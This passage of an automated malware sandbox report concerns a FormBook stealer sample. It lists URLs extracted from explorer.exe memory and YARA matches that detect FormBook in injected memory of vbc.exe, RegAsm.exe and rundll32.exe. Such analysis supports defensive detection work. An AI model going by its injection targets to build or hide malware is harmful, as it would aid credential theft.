Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2145875175.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2144980691.0000000003C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347518295.0000000001FB0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2144980691.0000000003C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347518295.0000000001FB0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2145136423.0000000003E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347696044.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2145136423.0000000003E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347696044.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: vbc.exe, 00000004.00000003.2138537315.0000000004CC0000.00000004.00000001.sdmpString found in binary or memory: http://ns.a
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: RegAsm.exe, 00000005.00000002.2170170387.0000000000BD0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2140356233.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2148500567.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2145136423.0000000003E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347696044.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159393395.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2145875175.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2145136423.0000000003E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347696044.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2159393395.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, file source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 4.2.vbc.exe.49e0000.3.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
